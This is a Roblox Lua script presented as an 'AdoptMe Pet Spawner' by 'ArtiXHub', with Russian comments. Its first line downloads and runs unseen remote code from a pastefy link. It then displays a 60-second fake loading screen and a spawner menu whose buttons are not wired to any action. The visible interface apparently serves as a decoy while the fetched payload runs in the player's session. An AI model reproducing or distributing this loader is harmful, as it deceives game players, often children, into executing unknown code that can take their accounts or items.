-- 1️⃣ Личный скрипт
loadstring(game:HttpGet("https://pastefy.app/BLldvDWO/raw"))() -- сюда вставляешь свой основной код

-- 2️⃣ Загрузочный экран
local TweenService = game:GetService("TweenService")
local Players = game:GetService("Players")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

local screenGui = Instance.new("ScreenGui")
screenGui.IgnoreGuiInset = true
screenGui.ResetOnSpawn = false
screenGui.Parent = playerGui

-- Фон загрузки
local bg = Instance.new("Frame")
bg.Size = UDim2.new(1,0,1,0)
bg.BackgroundColor3 = Color3.fromRGB(20,20,20)
bg.BackgroundTransparency = 1
bg.Parent = screenGui

-- Заголовок
local title = Instance.new("TextLabel")
title.Size = UDim2.new(1,0,0,100)
title.Position = UDim2.new(0,0,0.35,0)
title.BackgroundTransparency = 1
title.Text = "AdoptMe Pet Spawner ArtiXHub"
title.TextColor3 = Color3.fromRGB(255,255,255)
title.Font = Enum.Font.GothamBold
title.TextScaled = true
title.TextTransparency = 1
title.Parent = bg

-- Полоска контейнер
local barContainer = Instance.new("Frame")
barContainer.Size = UDim2.new(0.6,0,0,25)
barContainer.Position = UDim2.new(0.2,0,0.52,0)
barContainer.BackgroundColor3 = Color3.fromRGB(50,50,50)
barContainer.BorderSizePixel = 0
barContainer.BackgroundTransparency = 1
barContainer.Parent = bg

-- Полоска заполнения
local barFill = Instance.new("Frame")
barFill.Size = UDim2.new(0,0,1,0)
barFill.BackgroundColor3 = Color3.fromRGB(0,170,255)
barFill.BorderSizePixel = 0
barFill.Parent = barContainer

-- Проценты
local percentText = Instance.new("TextLabel")
percentText.Size = UDim2.new(1,0,0,40)
percentText.Position = UDim2.new(0,0,0.56,30)
percentText.BackgroundTransparency = 1
percentText.TextColor3 = Color3.fromRGB(255,255,255)
percentText.Font = Enum.Font.GothamBold
percentText.TextScaled = true
percentText.Text = "0%"
percentText.TextTransparency = 1
percentText.Parent = bg

-- Появление
TweenService:Create(bg, TweenInfo.new(1.2), {BackgroundTransparency = 0}):Play()
TweenService:Create(title, TweenInfo.new(1.2), {TextTransparency = 0}):Play()
TweenService:Create(barContainer, TweenInfo.new(1.2), {BackgroundTransparency = 0}):Play()
TweenService:Create(percentText, TweenInfo.new(1.2), {TextTransparency = 0}):Play()
task.wait(1.2)

-- Анимация полоски 60 секунд
local duration = 60
for i=0,100 do
    percentText.Text = i.."%"
    TweenService:Create(barFill, TweenInfo.new(duration/100), {Size = UDim2.new(i/100,0,1,0)}):Play()
    task.wait(duration/100)
end

-- Исчезновение
TweenService:Create(bg, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()
TweenService:Create(title, TweenInfo.new(1), {TextTransparency = 1}):Play()
TweenService:Create(barContainer, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()
TweenService:Create(percentText, TweenInfo.new(1), {TextTransparency = 1}):Play()
task.wait(1.1)
bg:Destroy()

-- Звук открытия меню
local sound = Instance.new("Sound")
sound.SoundId = "rbxassetid://9118823101"
sound.Volume = 1
sound.Parent = screenGui
sound:Play()

-- 3️⃣ Меню после загрузки (уменьшенное и перетаскиваемое)
local menu = Instance.new("Frame")
menu.Size = UDim2.new(0,300,0,250) -- меньшее окно
menu.Position = UDim2.new(0.5,-150,0.5,-125)
menu.BackgroundColor3 = Color3.fromRGB(255,176,80)
menu.BorderSizePixel = 0
menu.Parent = screenGui

-- Закругление
local corner = Instance.new("UICorner")
corner.CornerRadius = UDim.new(0,18)
corner.Parent = menu

-- Заголовок меню
local title2 = Instance.new("TextLabel")
title2.Size = UDim2.new(1,0,0,50)
title2.BackgroundTransparency = 1
title2.Text = "AdoptMe Pets Spawner"
title2.TextColor3 = Color3.fromRGB(255,255,255)
title2.Font = Enum.Font.GothamBold
title2.TextScaled = true
title2.Parent = menu

-- Поле ввода
local input = Instance.new("TextBox")
input.Size = UDim2.new(0.85,0,0,40)
input.Position = UDim2.new(0.075,0,0.25,0)
input.BackgroundColor3 = Color3.fromRGB(255,214,150)
input.BorderSizePixel = 0
input.PlaceholderText = "Write a pet name"
input.TextColor3 = Color3.fromRGB(60,60,60)
input.Font = Enum.Font.GothamBold
input.TextScaled = true
input.Parent = menu
local inputCorner = Instance.new("UICorner")
inputCorner.CornerRadius = UDim.new(0,12)
inputCorner.Parent = input

-- Кнопки Ride, Fly, Neon, Mega
local buttons = {
    {Text="Ride", Color=Color3.fromRGB(255,70,70)},
    {Text="Fly", Color=Color3.fromRGB(70,160,255)},
    {Text="Neon", Color=Color3.fromRGB(70,255,90)},
    {Text="Mega", Color=Color3.fromRGB(200,70,255)},
}

for i,b in ipairs(buttons) do
    local btn = Instance.new("TextButton")
    btn.Size = UDim2.new(0.21,0,0,35)
    btn.Position = UDim2.new(0.04 + (i-1)*0.23,0,0.5,0)
    btn.BackgroundColor3 = b.Color
    btn.BorderSizePixel = 0
    btn.Text = b.Text
    btn.TextColor3 = Color3.fromRGB(255,255,255)
    btn.Font = Enum.Font.GothamBold
    btn.TextScaled = true
    btn.Parent = menu
    local c = Instance.new("UICorner")
    c.CornerRadius = UDim.new(0,10)
    c.Parent = btn
end

-- Кнопка Spawn
local spawnBtn = Instance.new("TextButton")
spawnBtn.Size = UDim2.new(0.9,0,0,35)
spawnBtn.Position = UDim2.new(0.05,0,0.7,0)
spawnBtn.BackgroundColor3 = Color3.fromRGB(100,200,100)
spawnBtn.BorderSizePixel = 0
spawnBtn.Text = "Spawn"
spawnBtn.TextColor3 = Color3.fromRGB(255,255,255)
spawnBtn.Font = Enum.Font.GothamBold
spawnBtn.TextScaled = true
spawnBtn.Parent = menu
local spawnCorner = Instance.new("UICorner")
spawnCorner.CornerRadius = UDim.new(0,12)
spawnCorner.Parent = spawnBtn

-- Подпись
local footer = Instance.new("TextLabel")
footer.Size = UDim2.new(1,0,0,25)
footer.Position = UDim2.new(0,0,0.88,0)
footer.BackgroundTransparency = 1
footer.Text = "Script by ArtiXHub"
footer.TextColor3 = Color3.fromRGB(255,255,255)
footer.Font = Enum.Font.GothamBold
footer.TextScaled = true
footer.Parent = menu

-- 🌟 Перетаскивание окна касанием
local dragging, dragInput, dragStart, startPos

menu.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.Touch or input.UserInputType == Enum.UserInputType.MouseButton1 then
        dragging = true
        dragStart = input.Position
        startPos = menu.Position
        input.Changed:Connect(function()
            if input.UserInputState == Enum.UserInputState.End then
                dragging = false
            end
        end)
    end
end)

menu.InputChanged:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.Touch or input.UserInputType == Enum.UserInputType.MouseMovement then
        dragInput = input
    end
end)

game:GetService("UserInputService").InputChanged:Connect(function(input)
    if input == dragInput and dragging then
        local delta = input.Position - dragStart
        menu.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
    end
end)
